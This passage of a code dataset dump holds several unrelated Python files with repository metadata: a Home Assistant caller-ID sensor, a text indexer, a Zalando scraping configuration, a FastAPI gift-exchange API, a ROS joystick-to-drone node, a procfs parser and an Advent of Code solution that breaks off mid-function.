entity_platform.AddEntitiesCallback,\n discovery_info: DiscoveryInfoType | None = None,\n) -> None:\n \"\"\"Set up the Modem Caller ID component.\"\"\"\n hass.async_create_task(\n hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": SOURCE_IMPORT}, data=config\n )\n )\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n entry: ConfigEntry,\n async_add_entities: entity_platform.AddEntitiesCallback,\n) -> None:\n \"\"\"Set up the Modem Caller ID sensor.\"\"\"\n api = hass.data[DOMAIN][entry.entry_id][DATA_KEY_API]\n async_add_entities(\n [\n ModemCalleridSensor(\n api,\n entry.title,\n entry.data[CONF_DEVICE],\n entry.entry_id,\n )\n ]\n )\n\n async def _async_on_hass_stop(self) -> None:\n \"\"\"HA is shutting down, close modem port.\"\"\"\n if 
hass.data[DOMAIN][entry.entry_id][DATA_KEY_API]:\n await hass.data[DOMAIN][entry.entry_id][DATA_KEY_API].close()\n\n entry.async_on_unload(\n hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, _async_on_hass_stop)\n )\n\n platform = entity_platform.async_get_current_platform()\n\n platform.async_register_entity_service(SERVICE_REJECT_CALL, {}, \"async_reject_call\")\n\n\nclass ModemCalleridSensor(SensorEntity):\n \"\"\"Implementation of USB modem caller ID sensor.\"\"\"\n\n _attr_icon = ICON\n _attr_should_poll = False\n\n def __init__(\n self, api: PhoneModem, name: str, device: str, server_unique_id: str\n ) -> None:\n \"\"\"Initialize the sensor.\"\"\"\n self.device = device\n self.api = api\n self._attr_name = name\n self._attr_unique_id = server_unique_id\n self._attr_native_value = STATE_IDLE\n self._attr_extra_state_attributes = {\n CID.CID_TIME: 0,\n CID.CID_NUMBER: \"\",\n CID.CID_NAME: \"\",\n }\n\n async def async_added_to_hass(self) -> None:\n \"\"\"Call when the modem sensor is added to Home Assistant.\"\"\"\n self.api.registercallback(self._async_incoming_call)\n await super().async_added_to_hass()\n\n @callback\n def _async_incoming_call(self, new_state) -> None:\n \"\"\"Handle new states.\"\"\"\n if new_state == PhoneModem.STATE_RING:\n if self.native_value == PhoneModem.STATE_IDLE:\n self._attr_extra_state_attributes = {\n CID.CID_NUMBER: \"\",\n CID.CID_NAME: \"\",\n }\n elif new_state == PhoneModem.STATE_CALLERID:\n self._attr_extra_state_attributes = {\n CID.CID_NUMBER: self.api.cid_number,\n CID.CID_NAME: self.api.cid_name,\n }\n self._attr_extra_state_attributes[CID.CID_TIME] = self.api.cid_time\n self._attr_native_value = self.api.state\n self.async_write_ha_state()\n\n async def async_reject_call(self) -> None:\n \"\"\"Reject Incoming Call.\"\"\"\n await self.api.reject_call(self.device)\n","repo_name":"Secure-Platforms-Lab-W-M/Helion-on-Home-Assistant","sub_path":"ha-core/homeassistant/components/modem_callerid/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":4144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73109180947","text":"import re\r\n\r\nimport justext\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\nfrom pymorphy2 import MorphAnalyzer\r\n\r\npattern = re.compile(\"^[a-zA-Z]+$\")\r\nSTOPWORDS = stopwords.words('english')\r\n\r\n\r\ndef get_paragraphs_dict():\r\n result = dict()\r\n\r\n for i in range(1, 500):\r\n try:\r\n with open(f'../pages/{i}.txt', 'rb') as file:\r\n paragraphs = justext.justext(file.read(), justext.get_stoplist('English'))\r\n p = []\r\n for paragraph in paragraphs:\r\n if not paragraph.is_boilerplate:\r\n p.append(paragraph.text)\r\n result[i] = p\r\n except FileNotFoundError:\r\n continue\r\n return result\r\n\r\n\r\ndef get_lemmas_and_tokens(paragraphs_dict):\r\n nltk.download('stopwords')\r\n nltk.download('punkt')\r\n pymorphy2_analyzer = MorphAnalyzer()\r\n\r\n lemmas = dict()\r\n tokens = dict()\r\n for page_number, paragraphs in paragraphs_dict.items():\r\n l = dict()\r\n t = list()\r\n for paragraph in paragraphs:\r\n p_tokens = nltk.word_tokenize(paragraph)\r\n lowered_tokens = [token.lower() for token in p_tokens]\r\n t += [item for item in lowered_tokens if item not in STOPWORDS and pattern.match(item)]\r\n\r\n for token in t:\r\n token_normal_form = pymorphy2_analyzer.parse(token)[0].normal_form\r\n if token_normal_form in l:\r\n if token not in l[token_normal_form]:\r\n l[token_normal_form].append(token)\r\n else:\r\n 
l[token_normal_form] = [token, ]\r\n try:\r\n lemmas[page_number] = l\r\n tokens[page_number] = t\r\n except IndexError:\r\n continue\r\n\r\n return lemmas, tokens\r\n\r\n\r\ndef create_inverted_index(page_lemmas):\r\n all_lemmas = list()\r\n\r\n for page_num in range(1, len(page_lemmas.keys()) + 1):\r\n try:\r\n for item in page_lemmas[page_num].keys():\r\n all_lemmas.append(item)\r\n except KeyError:\r\n continue\r\n\r\n unique_lemmas = list(set(all_lemmas))\r\n unique_lemmas_dict_str = dict()\r\n unique_lemmas_dict_int = dict()\r\n\r\n for lemma in unique_lemmas:\r\n unique_lemmas_dict_int[lemma] = list()\r\n unique_lemmas_dict_str[lemma] = list()\r\n for page_num in range(1, len(page_lemmas.keys()) + 1):\r\n try:\r\n if lemma in page_lemmas[page_num].keys():\r\n unique_lemmas_dict_int[lemma].append(page_num)\r\n unique_lemmas_dict_str[lemma].append(str(page_num))\r\n continue\r\n except KeyError:\r\n continue\r\n\r\n return unique_lemmas_dict_int, unique_lemmas_dict_str\r\n\r\n\r\ndef save_result_file(inverted_index_dict):\r\n with open('inverted_index.txt', 'w', encoding='utf-8') as file:\r\n for lemma, pages in inverted_index_dict.items():\r\n file.write(f'{lemma}: {\", \".join(pages)}\\n')\r\n\r\n\r\nif __name__ == '__main__':\r\n paragraphs_dict = get_paragraphs_dict()\r\n print('Page parsed')\r\n\r\n lemmas, tokens = get_lemmas_and_tokens(paragraphs_dict)\r\n print('Lemmas and tokens were formed')\r\n\r\n inverted_index_dict_int, inverted_index_dict_str = create_inverted_index(lemmas)\r\n print('Inverted index formed')\r\n\r\n save_result_file(inverted_index_dict_str)\r\n print('Result file saved')\r\n","repo_name":"easydush/easysearch","sub_path":"index/indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7158812087","text":"import json\nfrom typing import List\n\nfrom core.domain import ConsumerLifestageType, GenderType, ProductCategory\n\n\ndef combine_results(\n path_2_category: dict,\n gender: str,\n consumer_lifestage: str,\n filters: list = [\n \"animal_welfare\",\n \"fair_conditions\",\n \"reducing_emissions\",\n \"reusing_materials\",\n \"sustainable_beauty\",\n \"water_saving\",\n ],\n) -> List[dict]:\n results = []\n for path, info in path_2_category.items():\n category, meta_data = info if type(info) == tuple else (info, {})\n results.append(\n {\n \"start_urls\": f\"https://www.zalando.fr/{path}/?cause={'.'.join(filters)}\",\n \"category\": category,\n \"gender\": gender,\n \"consumer_lifestage\": consumer_lifestage,\n \"meta_data\": json.dumps({\"family\": \"FASHION\", **meta_data}),\n }\n )\n return results\n\n\ndef male() -> List[dict]:\n path_2_category = {\n \"/t-shirts-basiques-homme/\": ProductCategory.TSHIRT.value,\n \"/t-shirts-imprimes-homme/\": ProductCategory.TSHIRT.value,\n \"/debardeur-homme/\": ProductCategory.TOP.value,\n \"/polos-homme/\": ProductCategory.SHIRT.value,\n \"/t-shirts-manches-longues-homme/\": ProductCategory.SHIRT.value,\n \"/t-shirt-sport-homme/\": ProductCategory.TSHIRT.value,\n \"/chemises-homme/\": ProductCategory.SHIRT.value,\n \"/sweats-capuche-homme/\": ProductCategory.SWEATER.value,\n \"/sweatshirts-homme/\": ProductCategory.SWEATER.value,\n \"/sweats-zippes-homme/\": ProductCategory.JACKET.value,\n \"/polaires-homme/\": ProductCategory.SWEATER.value,\n \"/gilets-homme/\": ProductCategory.JACKET.value,\n \"/pullovers-homme/\": ProductCategory.SWEATER.value,\n \"/vestes-homme/\": 
ProductCategory.JACKET.value,\n \"/manteaux-homme/\": ProductCategory.JACKET.value,\n \"/costume-homme/\": ProductCategory.SUIT.value,\n \"/vestes-costumes-homme/\": ProductCategory.JACKET.value,\n \"/chemises-classiques-homme/\": ProductCategory.SHIRT.value,\n \"/pantalons-costumes-homme/\": ProductCategory.PANTS.value,\n \"/gilets-costume-homme/\": ProductCategory.JACKET.value,\n \"/vestes-costume-homme/\": ProductCategory.JACKET.value,\n \"/jeans-homme/\": ProductCategory.JEANS.value,\n \"/pantalons-homme/\": ProductCategory.PANTS.value,\n \"/shorts-bermudas-homme/\": ProductCategory.SHORTS.value,\n \"/mode-homme-survetements/\": ProductCategory.TRACKSUIT.value,\n \"/ensemble-jogging-homme/\": ProductCategory.PANTS.value,\n \"/vestes-survetement-homme/\": ProductCategory.JACKET.value,\n \"/slips-calecons-homme/\": ProductCategory.UNDERWEAR.value,\n \"/maillots-corps-homme/\": ProductCategory.UNDERWEAR.value,\n \"/chaussettes-homme/\": ProductCategory.SOCKS.value,\n \"/pyjamas-homme/\": ProductCategory.NIGHTWEAR.value,\n \"/maillots-de-bain-homme/\": ProductCategory.SWIMWEAR.value,\n \"/serviettes-bain-homme/\": ProductCategory.TOWEL.value,\n \"/peignoirs-homme/\": ProductCategory.NIGHTWEAR.value,\n \"/poignoirs-robes-de-chambre-homme/\": ProductCategory.NIGHTWEAR.value,\n \"/t-shirts-techniques-homme/\": (ProductCategory.TSHIRT.value, {\"type\": \"SPORT\"}),\n \"/tops-homme/\": (ProductCategory.SHIRT.value, {\"type\": \"SPORT\"}),\n \"/sport-polos-homme/\": (ProductCategory.SHIRT.value, {\"type\": \"SPORT\"}),\n \"/sport-t-shirts-manches-longues-homme/\": (ProductCategory.SHIRT.value, {\"type\": \"SPORT\"}),\n \"/sport-chemises-homme/\": (ProductCategory.SHIRT.value, {\"type\": \"SPORT\"}),\n \"/maillots-entrainement-homme/\": (ProductCategory.SHIRT.value, {\"type\": \"SPORT\"}),\n \"/vestes-polaires-homme/\": (ProductCategory.JACKET.value, {\"type\": \"SPORT\"}),\n \"/sport-shorts-homme/\": (ProductCategory.SHORTS.value, {\"type\": \"SPORT\"}),\n \"/pantacourts-sport-homme/\": (ProductCategory.PANTS.value, {\"type\": \"SPORT\"}),\n \"/sport-pantalons-homme/\": (ProductCategory.PANTS.value, {\"type\": \"SPORT\"}),\n \"/collants-running-homme/\": (ProductCategory.PANTS.value, {\"type\": \"SPORT\"}),\n \"/pantalon-de-ski-homme/\": (ProductCategory.PANTS.value, {\"type\": \"SPORT\"}),\n \"/pulls-homme/\": (ProductCategory.SWEATER.value, {\"type\": \"SPORT\"}),\n \"/sport-sweats-capuche-homme/\": (ProductCategory.SWEATER.value, {\"type\": \"SPORT\"}),\n \"/sport-polaires-homme/\": (ProductCategory.SWEATER.value, {\"type\": \"SPORT\"}),\n \"/sport-sweatshirts-homme/\": (ProductCategory.JACKET.value, {\"type\": \"SPORT\"}),\n \"/survetements-homme/\": (ProductCategory.TRACKSUIT.value, {\"type\": \"SPORT\"}),\n \"/sport-sous-vetements-homme/\": (ProductCategory.UNDERWEAR.value, {\"type\": \"SPORT\"}),\n \"/sport-chaussettes-homme/\": (ProductCategory.SOCKS.value, {\"type\": \"SPORT\"}),\n \"/vetements-plage-homme/\": (ProductCategory.SWIMWEAR.value, {\"type\": \"SPORT\"}),\n \"/sport-chaussures-homme/\": (ProductCategory.SHOES.value, {\"type\": \"SPORT\"}),\n \"/sacs-dos-sport-homme/\": (ProductCategory.BACKPACK.value, {\"type\": \"SPORT\"}),\n \"/sport-sacs-homme/\": (ProductCategory.BAG.value, {\"type\": \"SPORT\"}),\n \"/baskets-homme/\": ProductCategory.SNEAKERS.value,\n \"/chaussures-basses-homme/\": ProductCategory.SHOES.value,\n \"/sandale-homme/\": ProductCategory.SHOES.value,\n \"/derbies-richelieus-homme/\": ProductCategory.SHOES.value,\n \"/chaussures-ville-homme/\": 
ProductCategory.SHOES.value,\n \"/boots-chaussure-montante-homme/\": ProductCategory.SHOES.value,\n \"/chaussons-homme/\": ProductCategory.SHOES.value,\n \"/sacs-bandouliere-homme/\": ProductCategory.BAG.value,\n \"/cabas-homme/\": ProductCategory.BAG.value,\n \"/sacoches-ordinateur-homme/\": ProductCategory.BAG.value,\n \"/bagages-sacs-de-sport-homme/\": ProductCategory.BAG.value,\n \"/sacs-a-dos-homme/\": ProductCategory.BACKPACK.value,\n \"/petits-sacs-homme/\": ProductCategory.BAG.value,\n \"/sacs-de-voyage-valises-homme/\": ProductCategory.BAG.value,\n }\n\n return combine_results(\n path_2_category,\n gender=GenderType.MALE.value,\n consumer_lifestage=ConsumerLifestageType.ADULT.value,\n )\n\n\ndef female() -> List[dict]:\n path_2_category = {\n \"/robes-femme/\": ProductCategory.DRESS.value,\n \"/t-shirts-femme/\": ProductCategory.TSHIRT.value,\n \"/debardeurs-femme/\": ProductCategory.TOP.value,\n \"/polos-femme/\": ProductCategory.SHIRT.value,\n \"/t-shirts-manches-longues-femme/\": ProductCategory.SHIRT.value,\n \"/chemisiers-tuniques-femme/\": ProductCategory.BLOUSE.value,\n \"/gilets-femme/\": ProductCategory.JACKET.value,\n \"/pulls-femme/\": ProductCategory.SWEATER.value,\n \"/sweatshirts-femme/\": ProductCategory.SWEATER.value,\n \"/sweats-capuche-femme/\": ProductCategory.SWEATER.value,\n \"/sweats-zippes-femme/\": ProductCategory.JACKET.value,\n \"/polaires-femme/\": ProductCategory.SWEATER.value,\n \"/vestes-femme/\": ProductCategory.JACKET.value,\n \"/manteaux-femme/\": ProductCategory.JACKET.value,\n \"/jeans-femme/\": ProductCategory.JEANS.value,\n \"/pantalons-femme/\": ProductCategory.PANTS.value,\n \"/shorts-femme/\": ProductCategory.SHORTS.value,\n \"/combinaisons-salopettes-femme/\": ProductCategory.OVERALL.value,\n \"/jupes-femme/\": ProductCategory.SKIRT.value,\n \"/lingerie-femme/\": ProductCategory.UNDERWEAR.value,\n \"/nuisettes-pyjamas-femme/\": ProductCategory.NIGHTWEAR.value,\n \"/collants/\": ProductCategory.UNDERWEAR.value,\n \"/leggings-femme/\": ProductCategory.PANTS.value,\n \"/chaussettes/\": ProductCategory.SOCKS.value,\n \"/chaussettes-de-sport-femme/\": ProductCategory.SOCKS.value,\n \"/chaussettes-hautes-femme/\": ProductCategory.SOCKS.value,\n \"/collants-femme/\": ProductCategory.SOCKS.value,\n \"/bikinis-femme/\": ProductCategory.SWIMWEAR.value,\n \"/maillots-de-bain-1-piece-femme/\": ProductCategory.SWIMWEAR.value,\n \"/t-shirts-techniques-femme/\": (ProductCategory.TSHIRT.value, {\"type\": \"SPORT\"}),\n \"/sport-polos-femme/\": (ProductCategory.SHIRT.value, {\"type\": \"SPORT\"}),\n \"/tops-femme/\": (ProductCategory.TOP.value, {\"type\": \"SPORT\"}),\n \"/sport-t-shirts-manches-longues-femme/\": (ProductCategory.SHIRT.value, {\"type\": \"SPORT\"}),\n \"/chemisiers-femme/\": (ProductCategory.BLOUSE.value, {\"type\": \"SPORT\"}),\n \"/maillots-entrainement-femme/\": (ProductCategory.SHIRT.value, {\"type\": \"SPORT\"}),\n \"/vestes-polaires-femme/\": (ProductCategory.JACKET.value, {\"type\": \"SPORT\"}),\n \"/sport-shorts-femme/\": (ProductCategory.SHORTS.value, {\"type\": \"SPORT\"}),\n \"/pantacourts-sport-femme/\": (ProductCategory.PANTS.value, {\"type\": \"SPORT\"}),\n \"/sport-pantalons-femme/\": (ProductCategory.PANTS.value, {\"type\": \"SPORT\"}),\n \"/collants-running-femme/\": (ProductCategory.PANTS.value, {\"type\": \"SPORT\"}),\n \"/pantalon-de-ski-femme/\": (ProductCategory.PANTS.value, {\"type\": \"SPORT\"}),\n \"/sport-pulls-femme/\": (ProductCategory.SWEATER.value, {\"type\": \"SPORT\"}),\n \"/sport-sweats-capuche-femme/\": 
(ProductCategory.SWEATER.value, {\"type\": \"SPORT\"}),\n \"/sport-polaires-femme/\": (ProductCategory.SWEATER.value, {\"type\": \"SPORT\"}),\n \"/sport-sweatshirts-femme/\": (ProductCategory.JACKET.value, {\"type\": \"SPORT\"}),\n \"/sport-robes-femme/\": (ProductCategory.DRESS.value, {\"type\": \"SPORT\"}),\n \"/sport-jupes-femme/\": (ProductCategory.SKIRT.value, {\"type\": \"SPORT\"}),\n \"/soutiens-gorge-sport-femme/\": (ProductCategory.UNDERWEAR.value, {\"type\": \"SPORT\"}),\n \"/sous-vetements-femme/\": (ProductCategory.UNDERWEAR.value, {\"type\": \"SPORT\"}),\n \"/chaussettes-femme/\": (ProductCategory.SOCKS.value, {\"type\": \"SPORT\"}),\n \"/survetements-femme/\": (ProductCategory.TRACKSUIT.value, {\"type\": \"SPORT\"}),\n \"/tenues-de-gym-justaucorps-femme/\": (ProductCategory.OVERALL.value, {\"type\": \"SPORT\"}),\n \"/vetements-plage-femme/\": (ProductCategory.SWIMWEAR.value, {\"type\": \"SPORT\"}),\n \"/sport-chaussures-femme/\": (ProductCategory.SHOES.value, {\"type\": \"SPORT\"}),\n \"/sacs-dos-sport-femme/\": (ProductCategory.BACKPACK.value, {\"type\": \"SPORT\"}),\n \"/sport-sacs-femme/\": (ProductCategory.BAG.value, {\"type\": \"SPORT\"}),\n \"/baskets-femme/\": ProductCategory.SNEAKERS.value,\n \"/chaussures-plates/\": ProductCategory.SHOES.value,\n \"/sandales-nu-pieds-femme/\": ProductCategory.SHOES.value,\n \"/sandales-de-bain-femme/\": ProductCategory.SHOES.value,\n \"/mules-sabots-femme/\": ProductCategory.SHOES.value,\n \"/ballerines-femme/\": ProductCategory.SHOES.value,\n \"/escarpins-femme/\": ProductCategory.SHOES.value,\n \"/talons-hauts-femme/\": ProductCategory.SHOES.value,\n \"/chaussures-mariee-femme/\": ProductCategory.SHOES.value,\n \"/bottines-femme/\": ProductCategory.SHOES.value,\n \"/bottes-femme/\": ProductCategory.SHOES.value,\n \"/chaussons-femme/\": ProductCategory.SHOES.value,\n \"/sacs-a-main-femme/\": ProductCategory.BAG.value,\n \"/pochettes/\": ProductCategory.BAG.value,\n \"/cabas-femme/\": ProductCategory.BAG.value,\n \"/sacs-bandouliere-femme/\": ProductCategory.BAG.value,\n \"/sacoches-ordinateur-femme/\": ProductCategory.BAG.value,\n \"/bagages-sacs-de-sport-femme/\": ProductCategory.BAG.value,\n \"/sacs-banane-femme/\": ProductCategory.BAG.value,\n \"/pochettes-etuis-femme/\": ProductCategory.BAG.value,\n \"/sacs-a-dos-femme/\": ProductCategory.BACKPACK.value,\n \"/sacs-de-voyage-valises-femme/\": ProductCategory.BAG.value,\n }\n\n return combine_results(\n path_2_category,\n gender=GenderType.FEMALE.value,\n consumer_lifestage=ConsumerLifestageType.ADULT.value,\n )\n\n\ndef get_settings() -> List[dict]:\n return male() + female()\n","repo_name":"calgo-lab/green-db","sub_path":"scraping/scraping/start_scripts/zalando_fr.py","file_name":"zalando_fr.py","file_ext":"py","file_size_in_byte":11928,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"48"} +{"seq_id":"42620872262","text":"from fastapi import FastAPI, Request\nfrom classes import *\nimport uvicorn\nfrom fastapi.responses import JSONResponse\n\nfrom fastapi.encoders import jsonable_encoder\nfrom typing import List\n\napp = FastAPI()\n\nID_GROUP = 1\nID_PARTICIPANT = 1\n\ngroups = []\nparticipants =[]\nparticipantsInGroups = []\nrecipients = []\n\ndef findInListByID(id: int, source: list):\n tmpActions = [item for item in source if item.id == id]\n if tmpActions == []:\n return -1\n else:\n return tmpActions[0]\n\ndef findGroupParticipantByID(id1: int, idperson: int):\n tmpActions = [item for item in participantsInGroups if 
item.ParticipantID == idperson and item.GroupID ==id1]\n    if tmpActions == []:\n        return -1\n    else:\n        return tmpActions[0]\n\n@app.post(\"/group\", status_code=202)\nasync def postPromo(request: Request):\n    global ID_GROUP\n    jsonbody = await request.json()\n    name = jsonbody['name']\n    description = jsonbody['description']\n    item = Group(name=name, id=ID_GROUP, description=description)\n    groups.append(item)\n    ID_GROUP += 1\n    return item.id\n\n@app.get(\"/groups\", response_model = List[Group], status_code=200)\nasync def getPromo():\n    return groups\n\n@app.get(\"/group/{id}\")\nasync def getPromoID(id: int):\n    global groups\n    tmpAction = findInListByID(id, groups)\n    if tmpAction == -1:\n        return JSONResponse(content={\"message\": \"Resource Not Found\"}, status_code=204)\n    IDparticipants = [item.ParticipantID for item in participantsInGroups if item.GroupID == id]\n    if IDparticipants != []:\n        tmpparticipants = [item for item in participants if item.id in IDparticipants]\n    else:\n        tmpparticipants = []\n    return {\"id\": tmpAction.id,\n            \"name\": tmpAction.name,\n            \"description\": tmpAction.description,\n            \"participants\": tmpparticipants}\n\n@app.put(\"/group/{id}\")\nasync def putPromoID(id: int, request: Request):\n    global groups\n    jsonbody = await request.json()\n    name = jsonbody['name']\n    description = jsonbody['description']\n    if name == '':\n        return JSONResponse(content={\"message\": \"Resource Not Found\"}, status_code=204)\n    for i in range(len(groups)):\n        if groups[i].id == id:\n            groups[i].description = description\n            groups[i].name = name \n            break\n    return \"OK\"\n\n@app.delete(\"/group/{id}\", status_code=202)\nasync def deletePromo(id: int):\n    global groups\n    tmp = findInListByID(id, groups)\n    groups.remove(tmp)\n\n#-------------------------------\n@app.post(\"/group/{id}/participant\")\nasync def postParticipant(id: int, request: Request):\n    global ID_PARTICIPANT, groups\n    tmpAction = findInListByID(id, groups)\n    if tmpAction == -1:\n        return JSONResponse(content={\"message\": \"Resource Not Found\"}, status_code=204)\n    jsonbody = await request.json()\n    name = jsonbody['name']\n    wish = jsonbody['wish']\n    item = Participant(id=ID_PARTICIPANT,name=name,wish=wish)\n    ID_PARTICIPANT += 1\n    participants.append(item)\n    item2 = ParticipantsInGroups(ParticipantID=item.id, GroupID=id)\n    participantsInGroups.append(item2)\n    return item.id\n\n@app.delete(\"/group/{id}/participant/{id2}\")\nasync def deleteParticipant(id: int, id2: int):\n    tmpAction = findInListByID(id, groups)\n    if tmpAction == -1:\n        return JSONResponse(content={\"message\": \"Resource Not Found\"}, status_code=204)\n    # look up the participant by its own id (id2), not the group id\n    tmpPerson = findInListByID(id2, participants)\n    participants.remove(tmpPerson)\n    tmppart = findGroupParticipantByID(id1=id, idperson=id2)\n    participantsInGroups.remove(tmppart)\n\n\n@app.post(\"/group/{id}/toss\")\nasync def postRaffle(id: int):\n    global groups\n    tmpAction = findInListByID(id, groups)\n    if tmpAction == -1:\n        return JSONResponse(content={\"message\": \"Resource Not Found\"}, status_code=204)\n    IDparticipants = [item.ParticipantID for item in participantsInGroups if item.GroupID == id]\n\n    if len(IDparticipants) < 3:\n        return JSONResponse(content={\"message\": \"Conflict\"}, status_code=409)\n\n    tmpparticipants = [item for item in participants if item.id in IDparticipants]\n    listRes = []\n    for i in range(len(tmpparticipants) - 1):\n        item = Recipients(Person=tmpparticipants[i],Recipient=tmpparticipants[i+1])\n        listRes.append(item)\n        recipients.append(item)\n    item = 
Recipients(Person=tmpparticipants[len(tmpparticipants)-1],Recipient=tmpparticipants[0])\n    listRes.append(item)\n    recipients.append(item)\n    return(listRes)\n\n@app.get(\"/group/{groupId}/participant/{participantId}/recipient\")\nasync def getRecipient(groupId: int, participantId: int):\n    tmpAction = findInListByID(participantId, participants)\n    tmprez = [item for item in recipients if item.Person == tmpAction]\n    return tmprez[0].Recipient\n\n\nif __name__ == \"__main__\":\n    uvicorn.run(app, host=\"localhost\", port=8080)","repo_name":"peacekeeper228/Olymp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"31283434107","text":"#!/usr/bin/env python\nimport rospy\nfrom sensor_msgs.msg import Joy\nfrom nano_drone.msg import sendRC\nfrom std_msgs.msg import Bool\nimport traceback\n\nclass Joy2RCin(object):\n    \"\"\"Joy2RCin ROS Node\"\"\"\n    def __init__(self):\n        # Initialize the Node\n        rospy.init_node(\"Joy2RCin\")\n        self.msg = sendRC()\n        self.msg.channels[0] = 1500\n        self.msg.channels[1] = 1500\n        self.msg.channels[2] = 1500\n        self.msg.channels[3] = 1000\n        self.arm = False\n        \n        # Setup the Joy topic subscription\n        self.joy_subscriber = rospy.Subscriber(\"joy\", Joy, self.handleJoyMessage, queue_size=1)\n\n        # Setup the Arm topic publisher\n        self.arm_pub = rospy.Publisher(\"/pi_drone/arm\", Bool, queue_size=1)\n        \n        # Setup the Twist topic publisher\n        self.rc_publisher = rospy.Publisher(\"/pi_drone/RC_in\", sendRC, queue_size=1)\n        rate = rospy.Rate(200) # 200hz\n\n        while not rospy.is_shutdown():\n            self.rc_publisher.publish(self.msg)\n            rate.sleep()\n\n    def handleJoyMessage(self, data):\n        \"\"\"Handles incoming Joy messages\"\"\"\n        self.msg.channels[0] = 1500 - (int)(data.axes[2] * 500)\n        self.msg.channels[1] = 1500 + (int)(data.axes[5] * 500)\n        self.msg.channels[3] = 1500 + (int)(data.axes[1] * 500)\n        self.msg.channels[2] = 1500 - (int)(data.axes[0] * 500)\n\n        if(data.buttons[5] == 1):\n            if not self.arm:\n                self.arm = True\n                self.arm_pub.publish(self.arm)\n        \n        else:\n            self.msg.channels[4] = 1000\n            self.arm = False\n            self.arm_pub.publish(self.arm)\n\n\n### If Main ###\nif __name__ == '__main__':\n    try:\n        Joy2RCin()\n    except:\n        rospy.logerr(\"Unhandled Exception in the Joy2RCin\"+\n                     \" Node:\\n\"+traceback.format_exc())\n\n","repo_name":"Razbotics/pi_drone_ros","sub_path":"scripts/joy_control.py","file_name":"joy_control.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"48"} {"seq_id":"37706497745","text":"\"\"\"/proc/fs/nfsd handlers\"\"\"\n\nfrom procfs.core import File, Dict\n\n\nclass pool_stats(File):\n    \"\"\"/proc/fs/nfsd/pool_stats\n    \"\"\"\n\n    def _parse(self, content):\n        header, values = content.splitlines()\n        keys = header[2:].replace('-', '_').split()\n        values = (int(i) for i in values.split())\n        return Dict(zip(keys, values))\n","repo_name":"pmuller/procfs","sub_path":"procfs/proc/fs/nfsd.py","file_name":"nfsd.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"48"} {"seq_id":"73529591507","text":"from utils import read_lines_into_list\nfrom typing import Dict\n\n\nclass Day7:\n\n    def __init__(self):\n        test_input_path = '../inputs/day07/input_test.txt'\n        final_input_path = '../inputs/day07/input.txt'\n        self.all_input_paths = [test_input_path, final_input_path]\n\n    def 
main(self):\n for input_path in self.all_input_paths:\n print(f\"\\nInput from: {input_path}\")\n dir_structure = self.parse_input(input_path)\n print(f\"dir structure: {dir_structure}\")\n total_dir_size = self.part1(dir_structure)\n size_of_dir_to_delete = self.part2(dir_structure)\n print(f\"Solution 1: {total_dir_size}\")\n print(f\"Solution 2: {size_of_dir_to_delete}\")\n\n def parse_input(self, file_path):\n list_of_lines = read_lines_into_list(file_path)\n dir_structure, i_inner, current_path = self.parse_lines(list_of_lines)\n return dir_structure\n\n def parse_lines(self, list_of_lines, current_path=\"\"):\n dir_structure = {}\n i = 0\n current_path = current_path\n while i < len(list_of_lines):\n line = list_of_lines[i]\n # cd means start a new key / add a key\n if line == '$ cd ..':\n current_path = '+'.join(current_path.split(\"+\")[:-1])\n return dir_structure, i, current_path\n elif line.startswith('$ cd'):\n\n dir_name = f\"{current_path}+{line[5:]}\"\n current_path = dir_name\n inner_dir_structure, i_inner, current_path = self.parse_lines(list_of_lines[i+1:], current_path)\n dir_structure[dir_name] = inner_dir_structure\n i += i_inner + 1\n elif line.startswith('$ ls'):\n # ls add all the next lines (until next command) to dictionary at this level\n pass\n elif line.startswith('dir'):\n pass # don't need this if you never cd it\n else: # 444 abc.txt means add {abc.text: 444}\n file_size, file_name = line.split(' ')\n dir_structure[file_name] = int(file_size)\n i += 1\n return dir_structure, i, current_path\n\n def part1(self, dir_structure):\n total_dir_size = self.get_total_dir_size_up_to_max_size(dir_structure, max_size=100000)\n return total_dir_size\n\n def part2(self, dir_structure: Dict, needed_space=30000000):\n recursive_dir_sizes = self.get_recursive_dir_sizes_of_all_dirs(dir_structure)\n free_space = self.get_total_free_space(recursive_dir_sizes)\n space_to_free = needed_space - free_space\n sizes_above_min = {}\n for dir_name, dir_size in recursive_dir_sizes.items():\n if dir_size >= space_to_free:\n sizes_above_min[dir_name] = dir_size\n return min(sizes_above_min.values())\n\n def get_total_dir_size_up_to_max_size(self, dir_structure: Dict, max_size):\n sizes_below_max = {}\n recursive_dir_sizes = self.get_recursive_dir_sizes_of_all_dirs(dir_structure)\n for dir_name, dir_size in recursive_dir_sizes.items():\n if dir_size <= max_size:\n sizes_below_max[dir_name] = dir_size\n return sum(sizes_below_max.values())\n\n def get_total_free_space(self, recursive_dir_sizes, total_space=70000000):\n used_space = recursive_dir_sizes['+/']\n free_space = total_space - used_space\n return free_space\n\n def get_recursive_dir_sizes_of_all_dirs(self, dir_structure: dict):\n \"\"\"\n Get recursive dir sizes per directory in nested_dir_structure\n :param dir_structure:\n :return: a flat dictionary with keys directory names and values recursive directory sizes\n \"\"\"\n recursive_dir_sizes = {}\n for dir_or_file, content in dir_structure.items():\n assert type(content) == int or type(content) == dict\n if type(content) == int: # it's a file\n pass\n elif type(content) == dict: # it's a dir\n recursive_size = self.get_total_dir_size_of_topmost_dir(content)\n inner_dir_sizes = self.get_recursive_dir_sizes_of_all_dirs(content)\n recursive_dir_sizes.update(inner_dir_sizes)\n recursive_dir_sizes[dir_or_file] = recursive_size\n return recursive_dir_sizes\n\n def get_total_dir_size_of_topmost_dir(self, dir_structure: dict):\n 